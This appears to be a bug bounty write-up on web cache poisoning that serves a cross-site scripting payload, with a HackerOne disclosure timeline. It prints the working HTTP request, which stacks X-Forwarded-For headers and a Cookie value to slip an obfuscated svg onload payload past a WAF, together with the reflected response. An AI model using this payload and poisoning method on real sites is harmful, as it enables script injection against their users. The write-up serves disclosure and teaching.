How I Made $16,500 Hacking CDN Caching Servers — Part 2

@bxmbn

A Nice Way To Hide XSS

Bounty: $2,000

While Google Dorking, i found a particular URL, but this time, was not being cached, but if i added an cacheable extension file (.js , .css) at the end of URL, it would cache the response.

Now, all i needed was to found a XSS. I found an injection point on a Cookie, but WAF would trigger when i added anything after %20

Cookie: cookiename=xss</script%20

While trying to bypass the WAF, I realized that my IP was also being reflected on that same script..

guid="</script ","24.99.19.20"

Since my IP was being reflected, I tried “X-Forwarded-For” Headers, this way i can close the <script> and avoid WAF, as it would trigger if it detected <[anything]>

This is why you will see 3 “X-Forwarded-For” Headers

Request:

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2 
Host: Redacted
X-Forwarded-For: xss 
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: > 
Cookie: gdId=xss</script%20

Response:

...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...

After Poisoned an URL with an XSS, an attacker just needed to send it to the victim

redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121

A nice way to hide XSS :D

This was my favorite Cache Poisoning, and it was found on a Public Program

https://hackerone.com/reports/1424094

Timeline:

Reported → December 11, 2021

Triaged → December 14, 2021

Bounty Awarded → January 7, 2022

Fixed → March 7, 2022

Next:

Part 3: Cache Poisoning DoS Via X-Forwarded-Scheme Header

🔈 🔈 Infosec Writeups is organizing its first-ever virtual conference and networking event. If you’re into Infosec, this is the coolest place to be, with 16 incredible speakers and 10+ hours of power-packed discussion sessions. Check more details and register here.

IWCon2022 - Infosec WriteUps Virtual Conference